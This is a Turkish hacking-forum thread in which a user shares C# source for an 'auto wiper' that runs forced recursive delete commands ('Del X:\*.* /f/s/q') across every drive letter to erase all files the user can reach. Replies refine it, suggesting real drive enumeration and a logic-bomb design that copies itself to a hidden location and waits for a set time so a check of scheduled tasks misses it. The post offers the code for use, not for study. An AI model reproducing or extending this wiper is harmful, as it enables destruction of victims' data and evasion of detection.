C# Auto Wiper [Kaynak Kod]
-
Merhaba Murid ve Murideler
Yazdigim bir programa eklemek icin bunu yapmistim sizin ilede paylasayim dedim.
EXE olan halini koymadim yanlislik ile tiklayan olursa ne var ne yok herseyi siliyor. (calistiran kullanici yetkileri ile)
Kod : http://blog.rakkoc.com/wp-content/uploads/2012/07/csWiper.cs
Programin beyin firtinasi kisminda AMD-X'e tesekkurler :p
-
Google chrome ile açtığımda siteni açmıyor hocam .
www.rakkoc.com kötü amaçlı yazılım içeriyor. Bu siteyi ziyaret ederseniz bilgisayarınıza virüs bulaşabilir vs diyor .
ftp ye gözkulak ol hocam ..
-
reca :O
-
Twitter bunu yazdı:
-----------------------------Google chrome ile açtığımda siteni açmıyor hocam .
www.rakkoc.com kötü amaçlı yazılım içeriyor. Bu siteyi ziyaret ederseniz bilgisayarınıza virüs bulaşabilir vs diyor .
ftp ye gözkulak ol hocam ..
-----------------------------
Yok abi ya Hitmotorunun linki olan siteleri banladi. bir sonraki guncellemede (12'de) duzelecek.
-
Isletim sisteni bulunan kisimlar ada atiyormu
-
Mx0TBT bunu yazdı:
Isletim sisteni bulunan kisimlar ada atiyormu
-----------------------------yetkisi olan kadarini siler. FORMAT atmiyor. normal siliyor zaten.
[code]
public csWiper() { //ExecuteCommandAsync("Del C:\\*.* /f/s/q"); //ExecuteCommandAsync("Del C:\\*.mp3 /f/s/q"); //ExecuteCommandAsync("Del C:\\*.mp3 C:\\*.avi /f/s/q"); Char[] driverChar = { 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'R', 'S', 'T', 'U', 'V', 'Y', 'Z' }; for (int i = driverChar.Length - 1; i >= 0; i--) { ExecuteCommandAsync("Del " + driverChar[i].ToString() + ":\\*.* /f/s/q"); } }[/code]
-
o şekilde driver isimlerinde dönmek yerine gerçekten driverların listesini alıp onunla dönsene hacım?
-
Mantık bombası olsa güzel olur olur bu, çalışacağı tarih ve saati belirlemek için bişeyler yapabilir misin hocam?
-
SharpShooter bunu yazdı:
-----------------------------o şekilde driver isimlerinde dönmek yerine gerçekten driverların listesini alıp onunla dönsene hacım?
System.IO.DriveInfo.GetDrives()-----------------------------
o an aklima gelmedi dogrusu :)
HoneyBadger bunu yazdı:
-----------------------------Mantık bombası olsa güzel olur olur bu, çalışacağı tarih ve saati belirlemek için bişeyler yapabilir misin hocam?
Zamanlandirilmis gorevlere atarsin ?
-
HoneyBadger bunu yazdı:
-----------------------------Mantık bombası olsa güzel olur olur bu, çalışacağı tarih ve saati belirlemek için bişeyler yapabilir misin hocam?
Zamanlandirilmis gorevlere atarsin ?
-----------------------------hocam biri orayı kontrol ederse iş biter, dosya çalıştığında kendini güvenli bi yere kopyalayacak ve süresini saymaya başlayacak olması lazım. Hem böyle daha hoş olur :)
-
Yanlış mı anladım yoksa sadece kök dizinlerdeki dosyaları mı siliyor? Çalıştırmadım ama alt klasörlere müdahele etmiyordu sanırım "del *.*" komutu.